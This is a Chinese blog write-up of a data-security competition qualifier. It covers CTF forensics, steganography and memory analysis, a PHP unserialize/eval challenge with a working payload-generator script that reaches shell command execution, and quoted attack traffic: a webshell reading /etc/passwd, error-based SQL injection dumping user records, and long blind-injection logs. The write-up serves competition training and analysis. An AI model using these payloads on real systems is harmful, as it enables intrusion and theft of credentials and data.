江苏省第二届数据安全技术应用职业技能竞赛初赛wp及复现

已于 2024-08-05 04:18:55 修改
阅读量633 收藏 17
点赞数 12
分类专栏: ctf web 取证 文章标签: web安全 安全 网络安全 系统安全 网络攻击模型 计算机网络 安全威胁分析
于 2024-08-05 04:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_79553403/article/details/140915917
版权
ctf 同时被 3 个专栏收录
1 篇文章 0 订阅
订阅专栏
web
1 篇文章 0 订阅
订阅专栏
取证
1 篇文章 0 订阅
订阅专栏

原链接:https://www.n0o0b.com/archives/6cdce096-92bd-400a-8871-ff34e1390a93

文章目录

02 数据安全解题赛

1、ds0602(30分):

题目描述:分析程序,获取对应附件中加密文件的原始数据,正确答案请提交解密后数据的第6行第2列数据

image-20240803203111540

赛博厨一把梭

flag:767378199223105126

2、333file(45分):

题目描述:请下载并分析文件,获取重要数据

audacity打开发现没什么东西

binwalk一下发现有zip信息

image-20240804163325451

再foremost一下分离出另一段音频

image-20240804163328795

audacity打开发现频谱图是一段密码pass:stego0626

image-20240804163546926

010打开,找到0x339CDE偏移处,发现数据区少个头(关于zip)

image-20240804165211551

补上数据区的PK头,即504B0304

image-20240804170527810

打开zip,发现需要密码,输入刚才找到的stego0626,打开发现乱码

image-20240804170628260

是zlib压缩数据

image-20240804172243342

丢赛博厨里

image-20240804172348112

flag:81633464866e622d275c309b22cb907b

3、pf文件分析(35分):

题目描述:某公司某天通过监测发现有一个员工最近正在窃取公司的机密信息,从他的电脑获取了一个压缩文件包,里面有软件运行的统计信息。想要知道他是怎么干的,首先需要找到他最常用的软件,然后开始调查。
答案为使用次数最多的软件名称,例如软件名是IEXPLORE.EXE,则答案是IEXPLORE.EXE,所有字母请大写

压缩包名SUFNUEFTU1dPUkQ=base64解密即为密码

image-20240803211356207

发现prefetch文件夹,里面都是.pd文件

使用WinPrefetchView,更改prefetch

image-20240803211547251

运行次数降序排列

image-20240803211833299

发现SEARCHFILTERHOST.EXE运行次数最多

flag:SEARCHFILTERHOST.EXE

4、丢失的资料(45分):

题目描述:销售小张为了保护自己的客户资源,将一个重要客户的资料进行了重重保护,但他最近却发现自己忘记了关键的密码信息。请分析文件,帮助小张找回该资料,将资料中客户的手机号的32位小写md5值就是答案。题目附件请访问: https://www.123pan.com/s/44wjVv-516Wd.html?提取码:LjL0

执行

 Volatility -f 1.raw --profile=Win7SP1x64 pslist

发现

image-20240805021310922

获取TrueCrypt主密钥信息,并保存

 Volatility -f 1.raw --profile=Win7SP1x64 truecryptmaster -D .

image-20240805023044388

使用MKDecrypt恢复并挂载disk文件

python3 MKDecrypt.py disk  -X ./0xfffffa80031c71a8_master.key

image-20240805032552676

脚本必须在linux上运行,wsl不方便挂载,wm优选

从挂载的disk中找到客户信息表.xls,有密码

image-20240805032619693

执行

Volatility -f 1.raw --profile=Win7SP1x64 cmdscan

image-20240805033016226

发现mysql密码ImportantInfo

发现ImportantInfo就是xls密码

image-20240805033717931

md5加密

image-20240805033800127

flag:6a9902ce8b8cc3cc24db1bafc19e0d65

5、greatphp(45分):

http://139.224.191.215:32813

题目描述:分析代码,获取重要数据

<?php
error_reporting(0);
class WOSHIMALOU {
    public $Nihao;
    public $Wohao;

    public function __wakeup(){
        if( ($this->Nihao != $this->Wohao) && (md5($this->Nihao) === md5($this->Wohao)) && (sha1($this->Nihao)=== sha1($this->Wohao)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->Nihao, $match)){
               eval($this->Nihao);
           } else {
               die("Try!!!!!!!!!");
           }
           
        }
    }
}

if (isset($_GET['getflag'])){
    unserialize($_GET['getflag']);
} else {
    highlight_file(__FILE__);
}

对于此题可以利用php原生类ExceptionErrorErrorException绕过

例如Exception

class Exception implements Throwable {
	/* 属性 */
	protected string $message = "";
	private string $string = "";
	protected int $code;
	protected string $file = "";
	protected int $line;
	private array $trace = [];
	private ?Throwable $previous = null;
	/* 方法 */
	public __construct(string $message = "", int $code = 0, ?Throwable $previous = null)
	final public getMessage(): string
	final public getPrevious(): ?Throwable
    final public getCode(): int
    final public getFile(): string
    final public getLine(): int
    final public getTrace(): array
    final public getTraceAsString(): string
    public __toString(): string
	private __clone(): void
}

message

异常消息内容

code

异常代码

file

抛出异常的文件名

line

抛出异常在该文件中的行号

previous

之前抛出的异常

string

字符串形式的堆栈跟踪

trace

数组形式的堆栈跟踪

那么Exception到底有什么用呢

image-20240804232742942

以上输出了

Exception: here is massage! in D:\Users\1\Downloads\a.php:3
Stack trace:
#0 {main}

Exception被当做string使用时,会自动调用Exception下的__tostring方法,然后返回$string私密属性

两次print_r函数可以发现string:Exception:private属性是在调用__tostring方法时生成的

image-20240804233549814

image-20240805001901522

相当于,md5是对于以下字符串作运算

Exception: here is massage! in D:\Users\1\Downloads\a.php:3
Stack trace:
#0 {main}

于是,可以轻易绕过md5sha1,对Exception实例对象作MD5或sha1运算会返回__tostring方法的返回值,即$string属性,而对于$string属性,是由$message属性加上$line属性文件位置以及固定字符串合成的,除了$message属性和$line属性其他都是基本不变的,所以Exception实例对象MD5或sha1运算的返回仅仅与$message属性和$line属性有关,即第一个参数和行号有关

在实例化代码同行的前提下,对于两个参数完全相等的Exception实例对象是弱等于但不强等于的

image-20240805000510159image-20240805000832399

于是,若想绕过($this->Nihao != $this->Wohao) && (md5($this->Nihao) === md5($this->Wohao)) && (sha1($this->Nihao)=== sha1($this->Wohao)),首先需要赋于$Nihao$Wohao二者Exception实例对象,然后即可转化为$Nihao$Wohao对象之间弱不等于且__tostring返回值强等于,剩下必须保证Exception实例的第一个参数相同,二者实例化同行,且控制与__tostring返回值不相干的属性不相同即可

以下利用第二个参数异常代码$code绕过,可以发现行数都为15,异常代码一个为1,一个为0,异常消息内容都为<shell>

image-20240805010932152image-20240805011001728

绕过可以轻松实现,可如何执行eval函数内php代码呢呢?

同样的,eval函数也将参数视为字符串类型,由此,传入Exception实例对象也会调用魔法函数__tostring,最后

测试发现,对于Exception实例对象的字符串返回中异常消息内容的前部分,即Exception: ,php不对其解析,不会构成报错

image-20240805011913171

:前可存在任意连续字符

而异常消息体后的内容可以通过?>闭合绕过,同时多余内容不做php解析直接输出

image-20240805013417118

/\<\?php|\(|\)|\"|\'/正则,括号引号都被过滤了,如何执行shell呢,四大命令执行函数都用不了了,那就反引号简单绕过

image-20240805013916685

最终payload生成脚本如下

<?php
class WOSHIMALOU
{
    public $Nihao;
    public $Wohao;
    public function __construct($a, $b){
        $this->Nihao=$a;
        $this->Wohao=$b;
    }
} 
$shell="echo `shell`;?>";	//填入shell命令
$a = new Exception($shell);$b = new Exception($shell,1);
$o = new WOSHIMALOU($a,$b);
$s = urlencode(serialize($o));
echo $s;

04 数据安全分析赛

简单分析

1、请填写正确答案

小明所创建的网站受到了攻击,现在需要对数据包进行分析,请你帮助他解答疑惑问题一:攻击者成功登陆后台的账号密码是?(如账号为admin,密码为admin,提交admin:admin

分析http流

在流9中,发现登录痕迹

image-20240803204358524

发现前几次账号密码错误

image-20240803203920881

最后一次正确

image-20240803204432029

其请求信息如下

POST /includes/login.php HTTP/1.1
Host: 172.16.5.217
Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.5.217
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.5.217/index.php?l=x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=a61k2c2kpq11runk1jmkq0q731

user_uname=elvis&user_pass=1234&loginsubmit=Log+In

flag:elvis:1234

2、请填写正确答案(问答)

问题二:攻击者使用的webshell文件名称以及执行了什么命令?
(如文件名称为123.php,命令为ls,则提交123.php:ls)

导出http对象发现webshe11here.php文件

image-20240803204850093

webshe11here.phppost上传了shell

cmd=system%28%27cat+..%2F..%2F..%2F..%2Fetc%2Fpasswd%27%29%3

image-20240803205105040

url解码

image-20240803205402126

执行cat ../../../../etc/passwd

webshe11here.php:cat …/…/…/…/etc/passwd

3、请填写正确答案(问答问题三):

被登录的后台用户对应的邮箱是什么?(如xxx@xxxx.com)

第一问得到登录用户为elvis

通过报错注入拿到unameuser_dateuser_emailuser_pass

GET /post.php?pid=111%20AND%20GTID_SUBSET%28CONCAT%280x71766b7871%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user_uname%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20ed01cms.cms_users%20ORDER%20BY%20user_id%20LIMIT%200%2C1%29%2C0x716a7a7071%29%2C4061%29 HTTP/1.1

找到流99处(tcp.stream eq 99),爆出user_id=1处,unameelvis

image-20240804153317268

通过限制user_id=1,找到其对应邮箱在流90

image-20240804160025988

image-20240804160240290

flag:elvis@stuvwxyz.com

黑客攻击探秘

1、请填写正确答案(问答)

某应用程序被攻击了,请分析日志回答以下问题
问题一:请问黑客采取的攻击手段是?(如有英文字母请大写)答案请先base64编码
后提交。例如:黑客采取的攻击手段是暴力破解,则先对“暴力破解”四个字进行 base64编码,得到5pq05Yqb56c06Kei,则提交5pq05Yqb56c06Kej

显然SQL注入,而且是盲注

image-20240803210005682

SQL注入base64加密

flag:U1FM5rOo5YWl

2、请填写正确答案(问答)

问题二:请问黑客最终破解的数据库名、表名以及字段名是什么?请用下划线连接
例如:Database_table_column 输入答案

172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 454 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 501 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
